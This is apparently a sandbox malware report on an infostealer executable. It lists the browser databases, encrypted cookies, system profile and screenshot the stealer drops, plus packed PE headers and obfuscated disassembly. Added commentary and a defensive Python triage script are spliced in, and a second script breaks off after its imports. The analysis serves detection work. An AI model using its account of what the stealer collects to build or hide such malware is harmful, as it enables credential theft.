                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, MZ for MS-DOS
                    Category:dropped
                    Size (bytes):4563640
                    Entropy (8bit):7.906115886926003
                    Encrypted:false
                    SSDEEP:98304:RpvmMxvdjYr/2BLOizdh/0Rzs24+WhXWXfRqCFh6MacgD5hB:vlVjMuBx0R7RrXpqiUhB
                    MD5:AF6E384DFABDAD52D43CF8429AD8779C
                    SHA1:C78E8CD8C74AD9D598F591DE5E49F73CE3373791
                    SHA-256:F327C2B5AB1D98F0382A35CD78F694D487C74A7290F1FF7BE53F42E23021E599
                    SHA-512:B55BA87B275A475E751E13EC9BAC2E7F1A3484057844E210168E2256D73D9B6A7C7C7592845D4A3BF8163CF0D479315418A9F3CB8F2F4832AF88A06867E3DF93
                    Malicious:true
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: ReversingLabs, Detection: 83%
                    Preview:MZ@.....................................!..L.!Win32 .EXE...$@...PE..L....M.a.....................^.......w......0....@...........................}.....m.F.......................................w.......w.|.............E.............................................................P.w..............................MPRESS1.pw.......?......................MPRESS22.....w.......?..................rsrc...|.....w.......?.............@..............................................................................v2.19w...?. ...o......G>H.r9aQ..(.......`....=....?....!.Z..&I........I18..Z!..Y..s...[QX....a....YY...).v.....n......|)....^f..+.>..84h82g...>*.hb\...E.(.x.....@.8_.9.4U.m..'.s......#.....03.......O..]`..S2.@#.........oF~.*.R..Q..q.o.yn...OA@|....g...F....0.j.......s/..H..+ 0C.!....7s..^H,...... ..{...............D......r.I..,|........u.6......E>q..}....g..).U..ME.'.j}.........7^...w.......Le......k.T.`.#%....b..n.F.&-o..../8S.E..{1.E..,....<.c|b.z.Fz........|..W"p.
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                    Category:dropped
                    Size (bytes):196608
                    Entropy (8bit):1.121297215059106
                    Encrypted:false
                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                    MD5:D87270D0039ED3A5A72E7082EA71E305
                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                    Malicious:false
                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.136413900497188
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                    MD5:429F49156428FD53EB06FC82088FD324
                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                    Malicious:false
                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                    Category:dropped
                    Size (bytes):196608
                    Entropy (8bit):1.121297215059106
                    Encrypted:false
                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                    MD5:D87270D0039ED3A5A72E7082EA71E305
                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                    Malicious:false
                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):40960
                    Entropy (8bit):0.8553638852307782
                    Encrypted:false
                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                    MD5:28222628A3465C5F0D4B28F70F97F482
                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:ASCII text, with very long lines (369), with CRLF line terminators
                    Category:dropped
                    Size (bytes):530
                    Entropy (8bit):5.999391385907715
                    Encrypted:false
                    SSDEEP:12:copYxSlufq7gCx7Fbyr4rOSlTfJJADr6HDsZQZ7gC6:KauS79Gr4iSllJALQZ7c
                    MD5:06ED2CD304730F55A5C7001509E128BE
                    SHA1:49651485B2CE3D239172BD52BF5A265AB3EB8E18
                    SHA-256:66851B5AA77B3DEE71B842F53D4E30F664F5A08F9754B9E87B323871981516A4
                    SHA-512:0163A8537DE695D34865EEB9C872F15A1827644D8797344A2D36E776F174E5901E77AA560488B0D7D7359B3648614F818B85A7D51F59CCDF2831B5715F5A9334
                    Malicious:false
                    Preview:.google.com.FALSE./.TRUE.1699018815.1P_JAR.ENC893*_djEwmUj/dRHWNmfhbTB/w+u3HcpAF49UGcxvovgmz9ye9OQyJO9KCFHkRm8=_Spn23kok+Q5pGfoIFZdfhpScu2LLLElOWGEpK4fGivY=*...google.com.TRUE./.TRUE.1712238015.NID.ENC893*_djEwFCqquAx+Q1mLxpuZeEBJZSgzAt4Ngo/HHXcYPxMGINXG0MJzCe/y7m5VzpUyfsA6ingOdNobTvWP/YbKYpzg64nmGlCjRU9RpPIjDAuAxGlp5MTMUaOP4iC8aSCuijjqDE5gAdZQ5Jgb0/uEAZ4ssWGDsxXJbqpGbi04viYfPDhBfQ9XKXznqtHW/weYlNZJIGlKZBsCWoEIKfuL56VHKaBt04gLO/XK1/P3nHsp6pSc1x1uk1RRK7hSYUjCY5G/hcpBBjFv74dICDI=_Spn23kok+Q5pGfoIFZdfhpScu2LLLElOWGEpK4fGivY=*..
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):112
                    Entropy (8bit):4.9113057226932435
                    Encrypted:false
                    SSDEEP:3:N8DSLvIJiMgTE2WdkQVjDSLvIJiMhKVX3L2WdkQVQ:2OLciodFOLciA8dq
                    MD5:0CE7E561D96623E70DD177304D3B56DA
                    SHA1:27B4131817E71657AED90C086E01E7E925BF641E
                    SHA-256:E0B2F92CFB58B7D5EDFBB1FDF3E81194D4E55A90706986C389BDF21D2AD2325D
                    SHA-512:48154E76523305BBB7ED39FEAD22CB4DD6FDD568259DC8D0E70ABA4A21030DAF6D1274E0DC5D7F10DFCF7B3B61BD2401FFB4768F301AEF04F142AF23EF335AB5
                    Malicious:false
                    Preview:https://www.mozilla.org/privacy/firefox/.1696426831..https://www.mozilla.org/en-US/privacy/firefox/.1696426831..
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:ASCII text, with CRLF, LF line terminators
                    Category:dropped
                    Size (bytes):6549
                    Entropy (8bit):5.6055337767834965
                    Encrypted:false
                    SSDEEP:96:xzDyJ2mRkoc2KBhA6tsxODsZ8svxhjANUbg3x:xfYyoX6tsxPZ8skB
                    MD5:F949146D8F44A5E3B39FFA8B299C2CE4
                    SHA1:7764E054E6A828328274D08D593F17D996027466
                    SHA-256:34F3899A8081AA366C82D37E25B800E63D675DB221E3BB375D785C3BDE64B2D3
                    SHA-512:1E2843ECFFEF386A1BC2A08619A2256A2D639E20C886D5A7349D11EC38C10FDA574010740EC909FACA4EB938FEE666CB37B2AF9DDB7EBA7C5C89DE8BD3369423
                    Malicious:false
                    Preview:Build: default..Version: 2.0....Date: Fri May 17 17:45:09 2024.MachineID: 9e146be9-c76a-4720-bcdb-53011b87bd06..GUID: {a33c7340-61ca-11ee-8c18-806e6f6e6963}..HWID: 3d7cb3c48b150bab83c70d51fda6606f....Path: C:\Users\user\Desktop\file.exe..Work Dir: C:\Users\user\AppData\Local\Temp\trixy1UB98D2D2zeo....IP: 12.205.151.60..Location: US, San Francisco..ZIP (Autofills): -..Windows: Windows 10 Pro [x64]..Computer Name: 855271 [WORKGROUP]..User Name: user..Display Resolution: 1280x1024..Display Language: en-CH..Keyboard Languages: English (United Kingdom) / English (United Kingdom)..Local Time: 17/5/2024 17:45:9..TimeZone: UTC-5....[Hardware]..Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..CPU Count: 4..RAM: 8191 MB..VideoCard #0: Microsoft Basic Display Adapter....[Processes]..System [4]..Registry [92]..smss.exe [332]..csrss.exe [420]..wininit.exe [496]..csrss.exe [504]..winlogon.exe [564]..services.exe [632]..lsass.exe [640]..svchost.exe [752]..fontdrvhost.exe [780]..fontdrvhost.ex
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:Unicode text, UTF-8 text, with CRLF, LF line terminators
                    Category:dropped
                    Size (bytes):4897
                    Entropy (8bit):2.518316437186352
                    Encrypted:false
                    SSDEEP:48:4MMMMMMMMMMdMMMM1MMMMMMMM1MMMMMMMM1MMMMMMMM1MMMMMMMMMMdMMMMMMMM3:q
                    MD5:B3E9D0E1B8207AA74CB8812BAAF52EAE
                    SHA1:A2DCE0FB6B0BBC955A1E72EF3D87CADCC6E3CC6B
                    SHA-256:4993311FC913771ACB526BB5EF73682EDA69CD31AC14D25502E7BDA578FFA37C
                    SHA-512:B17ADF4AA80CADC581A09C72800DA22F62E5FB32953123F2C513D2E88753C430CC996E82AAE7190C8CB3340FCF2D9E0D759D99D909D2461369275FBE5C68C27A
                    Malicious:false
                    Preview:................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                    Category:dropped
                    Size (bytes):711746
                    Entropy (8bit):7.924358481947605
                    Encrypted:false
                    SSDEEP:12288:LN5Ik7hE5TUlevY31R2XSefNY396zjUvZKyn7tg1czUxd8B+x5ruugEnlV1MCvXu:Yk78Uj1RySeC0zjoKy7e1Z/8ofcEjm
                    MD5:576DFC1AEDDC22FF1B5B2ED158DCDEFD
                    SHA1:3BF1C8AC4E8541BB33DB2F6672DF544F5C32B4D4
                    SHA-256:9731A447D10DC67279FC1D5DA41A48637E4FE5C685FDC95EAF090EA0B6BEA50F
                    SHA-512:7AB6B3136DFF3CFA505266649352247BBBE3303D2DE02453D695693EA1FB5015F9925669BC555A15F66033484F613EAD769560AD60A9546C31C74781D9BEA7D3
                    Malicious:false
                    Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..w.mG........ms......c...~.VuU..UUt.V.{o......$.......$.,.@.S.E...9...d......./..............1#..;...7f......<9.'...N....^'?5..I......3.......Nx|..7"S..|_.....:~..q....-.Wl!..........y1.......0|...Jo.C.b....H.G.}G0u......X..h.......w...b......S........].|...J...L.TE..w.....X...{.A.=w.d.."....w.=...w..1...'.....A.Z~0+..>7.o..H.TL......g..L.%.......M.Y..|_..z.wG...1S..Na....^{.......:Gc..1.....k,|..z.-...%..2..w.knJ.W......t..3X..S........../.X...c....{e....\?...L..%.7,}E.g..2...X....u........|..i..y...MK^~M..X......].-....9g.?.}.u..6M.uM..yu..qU.._..|o9.. .v...9gEn...y......nW.9.K.>..,....hk...=.N.....0^.{....B..+...}.O+........#..=.......].k..../L.zY......|.|...v...-.......u3.....+.g].?..]//..-.%.S.s.o...s...;....S;\RX..yLN.s.Kv..P....!.}..v...m/)..;.....osq7.s.a..y_..b-......vy}n5^.m....d.|..'.<A.y`n..;.1..{.....E%...%.\].
                    Process:C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe
                    File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, MZ for MS-DOS
                    Category:dropped
                    Size (bytes):4563640
                    Entropy (8bit):7.906115886926003
                    Encrypted:false
                    SSDEEP:98304:RpvmMxvdjYr/2BLOizdh/0Rzs24+WhXWXfRqCFh6MacgD5hB:vlVjMuBx0R7RrXpqiUhB
                    MD5:AF6E384DFABDAD52D43CF8429AD8779C
                    SHA1:C78E8CD8C74AD9D598F591DE5E49F73CE3373791
                    SHA-256:F327C2B5AB1D98F0382A35CD78F694D487C74A7290F1FF7BE53F42E23021E599
                    SHA-512:B55BA87B275A475E751E13EC9BAC2E7F1A3484057844E210168E2256D73D9B6A7C7C7592845D4A3BF8163CF0D479315418A9F3CB8F2F4832AF88A06867E3DF93
                    Malicious:true
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: ReversingLabs, Detection: 83%
                    Preview:MZ@.....................................!..L.!Win32 .EXE...$@...PE..L....M.a.....................^.......w......0....@...........................}.....m.F.......................................w.......w.|.............E.............................................................P.w..............................MPRESS1.pw.......?......................MPRESS22.....w.......?..................rsrc...|.....w.......?.............@..............................................................................v2.19w...?. ...o......G>H.r9aQ..(.......`....=....?....!.Z..&I........I18..Z!..Y..s...[QX....a....YY...).v.....n......|)....^f..+.>..84h82g...>*.hb\...E.(.x.....@.8_.9.4U.m..'.s......#.....03.......O..]`..S2.@#.........oF~.*.R..Q..q.o.yn...OA@|....g...F....0.j.......s/..H..+ 0C.!....7s..^H,...... ..{...............D......r.I..,|........u.6......E>q..}....g..).U..ME.'.j}.........7^...w.......Le......k.T.`.#%....b..n.F.&-o..../8S.E..{1.E..,....<.c|b.z.Fz........|..W"p.
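The same 4563640-byte PE (SHA-256 F327C2B5...E599) appears twice in this listing, once dropped by file.exe and once by the second stage llmcrdwzLnNKYB4T0Vnw.exe, with entropy 7.906 and MPRESS1/MPRESS2 section names visible in the preview. The following is an added triage helper, not code from the Joe Sandbox report: it parses records in the key:value layout used above, collapses drops of identical content by SHA-256 while keeping every dropping process, and flags PE drops that look packed. The entropy threshold and the packer-marker list are assumptions; SAMPLE_LISTING is constructed from the records above with File Type and Category lines omitted and Preview fields shortened.

```python
"""Triage of a sandbox 'dropped files' listing (added example, not report code).
Parses the key:value records, collapses identical drops by SHA-256 and flags
PE drops that look packed. SAMPLE_LISTING is constructed from the records
above, with File Type/Category lines omitted and Preview fields shortened."""

# Assumption: 8-bit Shannon entropy (max 8.0) at or above this is typical of
# packed or encrypted PE content; the report's dropped PE is at 7.906.
PACKED_ENTROPY_THRESHOLD = 7.5
# Assumption: section-name markers of common packers. MPRESS1/MPRESS2 are the
# names visible in the report's PE preview; the others are added for coverage.
PACKER_SECTION_MARKERS = ("MPRESS1", "MPRESS2", "UPX0", "UPX1", ".vmp0", ".themida")


def parse_records(text: str) -> list:
    """One dict per 'Process:' line. 'key:value' lines fill it; the
    '• Antivirus:' bullets under the bare 'Antivirus:' header go into 'av'."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("Process:"):
            if cur is not None:
                records.append(cur)
            cur = {"av": []}
        if cur is None or not line:
            continue
        if line.startswith("• Antivirus:"):
            cur["av"].append(line[len("• Antivirus:"):].strip())
            continue
        key, sep, val = line.partition(":")   # split on the first ':' only
        if sep and val:                        # header-only lines are skipped
            cur[key.strip()] = val.strip()
    if cur is not None:
        records.append(cur)
    return records


def packer_markers(preview: str) -> list:
    return [m for m in PACKER_SECTION_MARKERS if m in preview]


def triage(text: str) -> list:
    """Collapse identical content by SHA-256 but keep every dropping process,
    so a second stage re-dropping the same payload stays visible."""
    by_hash = {}
    for r in parse_records(text):
        sha = r.get("SHA-256", "").lower()
        if sha in by_hash:
            by_hash[sha]["droppers"].append(r["Process"])
            continue
        preview = r.get("Preview", "")
        entropy = float(r.get("Entropy (8bit)", "0"))
        is_pe = preview.startswith("MZ")
        markers = packer_markers(preview)
        by_hash[sha] = {
            "sha256": sha,
            "droppers": [r["Process"]],
            "size": int(r.get("Size (bytes)", "0")),
            "entropy": round(entropy, 3),
            "pe": is_pe,
            "packer_markers": markers,
            "likely_packed": is_pe and (entropy >= PACKED_ENTROPY_THRESHOLD or bool(markers)),
            "malicious": r.get("Malicious", "false").lower() == "true",
            "av": r["av"],
        }
    return list(by_hash.values())


# Constructed from the report's records; previews shortened.
SAMPLE_LISTING = """\
Process:C:\\Users\\user\\Desktop\\file.exe
Size (bytes):4563640
Entropy (8bit):7.906115886926003
SHA-256:F327C2B5AB1D98F0382A35CD78F694D487C74A7290F1FF7BE53F42E23021E599
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: ReversingLabs, Detection: 83%
Preview:MZ@.....PE..L....MPRESS1.pw.......MPRESS22.....rsrc...
Process:C:\\Users\\user\\AppData\\Local\\Temp\\span1UB98D2D2zeo\\llmcrdwzLnNKYB4T0Vnw.exe
Size (bytes):4563640
Entropy (8bit):7.906115886926003
SHA-256:F327C2B5AB1D98F0382A35CD78F694D487C74A7290F1FF7BE53F42E23021E599
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: ReversingLabs, Detection: 83%
Preview:MZ@.....PE..L....MPRESS1.pw.......MPRESS22.....rsrc...
Process:C:\\Users\\user\\Desktop\\file.exe
Size (bytes):196608
Entropy (8bit):1.121297215059106
SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
Malicious:false
Preview:SQLite format 3......@ ...
"""

if __name__ == "__main__":
    for hit in triage(SAMPLE_LISTING):
        print(hit)
```

Deduplicating by hash rather than by path keeps the listing honest about how many distinct payloads there are (here one packed PE and the browser databases) while the `droppers` list preserves the chain of which process wrote each copy, which is what you want when building a detection for the second-stage copy in `%LOCALAPPDATA%\Temp`.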
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Archive, ctime=Fri May 17 20:45:15 2024, mtime=Fri May 17 20:45:15 2024, atime=Fri May 17 20:45:15 2024, length=4563640, window=hide
                    Category:dropped
                    Size (bytes):1330
                    Entropy (8bit):4.862977598680543
                    Encrypted:false
                    SSDEEP:24:8KHfmf8HVMQROgKb6xA9lE9d7lwXAIB1yNdFd2aSnqygm:8KHuErRy6xIExwwIB1yVryg
                    MD5:C519A29483EE8E20AA66C2CBC23EA91F
                    SHA1:245FD3D3F14D96CF46380E7DB0018727F62E16D7
                    SHA-256:0399769E4CD0930D72CED5E76A98ACB37116D28F75A3FF8C27D385DFA9774B12
                    SHA-512:CA8EF450FD17E6CEF7F1D28727ED90A36FD60F0E263E022F48B4017AC6AE80D14EE23E14A16D4525BB491BEBB47EA48D9121ADD350684578C9E39CAA19F62335
                    Malicious:false
                    Preview:L..................F.... ...c.......c................E.....................X.:..DG..Yr?.D..U..k0.&...&...... M........p....$...........t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.X......B.....................Bdg.A.p.p.D.a.t.a...B.P.1......X....Local.<......DWSl.X......V.....................S4N.L.o.c.a.l.....N.1......X....Temp..:......DWSl.X......\....................... .T.e.m.p.......1......X....EDGEMS~1.........X...X.............................. .E.d.g.e.M.S.2._.4.5.c.4.8.c.c.e.2.e.2.d.7.f.b.d.e.a.1.a.f.c.5.1.c.7.c.6.a.d.2.6.....b.2...E..X.. .EdgeMS2.exe.H......X...X............................c.q.E.d.g.e.M.S.2...e.x.e.......................-............................C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe....E.d.g.e.M.S.2.Q.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.M.S.2._.4.5.c.4.8.c.c.e.2.e.2.d.7.f.b.d.e.a.1.a.f.c.5.1.c.7.c.6.a.d.2.6.\.E.d.g.e.M.S.2...e.x.e.........
                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):7.973325521474956
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:file.exe
                    File size:8'778'752 bytes
                    MD5:3d09739846543f4962f2b432da671c29
                    SHA1:2247e38b1f5257df93db091328488c652f6bea0a
                    SHA256:70aaa6e67944e919f8c7bbdf71b6b09deed41f51166bc1dc15fc6f66efc1b014
                    SHA512:f762d0c8d9ce9a8a7189af007ec9b6e4ff863005f982d107b2b276281152f64386425b7fbe8ceda2b96ab9d7f827eb99358e3920ec79c9f5a063b87aa7e7bf5d
                    SSDEEP:196608:EMnAaGWGFMEFFP8/1IK56wtjoRvH8FPuAfs/4:ZnAafG5w/1I4TtsRvqur
                    TLSH:F796336331651185D1EAC93E9A377E9533F2523F464184FCB4A97FC22AE25F5E203A83
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...jR;f...............'............?X............@.................................p.....@................................
                    Icon Hash:07e3b7d7b794c087
                    Entrypoint:0xc7583f
                    Entrypoint Section:.vmpY[.
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                    Time Stamp:0x663B526A [Wed May 8 10:22:34 2024 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:6
                    OS Version Minor:0
                    File Version Major:6
                    File Version Minor:0
                    Subsystem Version Major:6
                    Subsystem Version Minor:0
                    Import Hash:d784b50e0634f83cc71436d4fb111768
                    Instruction
                    push D6FCCA80h
                    call 00007F2B8D8299F1h
                    inc ecx
                    jmp 00007F2B8D27FB97h
                    stc
                    xor edx, 1F142980h
                    stc
                    xor ebx, edx
                    cmp di, 1557h
                    stc
                    add ebp, edx
                    jmp 00007F2B8D3AC82Dh
                    je 00007F2B8D366777h
                    mov bl, cl
                    sub bl, 00000030h
                    jmp 00007F2B8D36D01Ch
                    dec edx
                    cmp esp, 40C2572Eh
                    xor ebx, edx
                    add edi, edx
                    jmp 00007F2B8D30919Ah
                    jmp 00007F2B8D229C49h
                    inc ecx
                    dec ebx
                    push ebp
                    inc esp
                    xor dword ptr [esp], ebx
                    inc eax
                    xchg ch, ch
                    inc eax
                    shl ch, FFFFFFA1h
                    bt bp, sp
                    pop ebp
                    stc
                    inc ebp
                    test cl, ah
                    dec ebp
                    arpl bx, bx
                    inc esp
                    test bl, dl
                    jmp 00007F2B8D29711Ah
                    or esi, ebx
                    lodsb
                    test dword ptr [eax-0879947Ah], 8E05EDA3h
                    neg dword ptr [edx+eax+52F795DBh]
                    mov ah, 54h
                    sahf
                    or dword ptr [eax+08CC3DDEh], esp
                    dec esi
                    sbb byte ptr [esi+08h], ah
                    int1
                    Name | Virtual Address | Virtual Size | Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | 
                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0xed6cf8 | 0x190 | .vmpY[.
                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf76000 | 0x26ee8 | .rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | 
                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | 
                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xf75000 | 0x5c8 | .reloc
                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | 
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | 
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | 
                    IMAGE_DIRECTORY_ENTRY_TLS | 0xd25c80 | 0x20 | .vmpY[.
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xf73760 | 0x40 | .vmpY[.
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | 
                    IMAGE_DIRECTORY_ENTRY_IAT | 0x75a000 | 0x290 | .vmpY[.
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x7b1880 | 0x40 | .vmpY[.
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | 
                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | 
                    Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                    .text | 0x1000 | 0x15bae8 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .rdata | 0x15d000 | 0x27e32 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .data | 0x185000 | 0x4930 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .vmp#+ | 0x18a000 | 0x121e7a | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .vmp#+ | 0x2ac000 | 0x580 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .vmp#+ | 0x2ad000 | 0x1427e0 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .vmpY[. | 0x3f0000 | 0x34b3e7 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .vmpY[. | 0x73c000 | 0x838010 | 0x838200 | bdacb5ec0292c102fa3f2bae395ef848 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .reloc | 0xf75000 | 0x5c8 | 0x600 | 2025a475ee6a4cf5d3bdd2e9ccf3e193 | False | 0.5325520833333334 | data | 4.322933984772373 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .rsrc | 0xf76000 | 0x26ee8 | 0x26800 | dd048426ffb4368f719a01897ce94a50 | False | 0.6937715604707793 | data | 6.736445338106505 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
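The section table above carries the static traits the signature list calls out: two section names built from non-identifier characters (.vmp#+, .vmpY[.), six sections whose raw size is 0 but whose virtual size is large (they exist only in memory and are filled by the unpacker at run time), one 8 MB executable section holding the packed payload, and an entry point (0xc7583f) inside that section rather than in .text. The script below is an added example and not Joe Sandbox's own detection logic: it parses the DOS, COFF and section headers of a PE image with only the standard library and reports those four conditions. By default it runs on a constructed minimal PE32 that copies the layout pattern (section names taken from this report, contents a deterministic filler, not bytes from the sample); pass a file path as the first argument to triage a real binary. The entropy threshold and the "normal" section-name pattern are my choices, not values from the report.

```python
import hashlib
import math
import re
import struct
import sys

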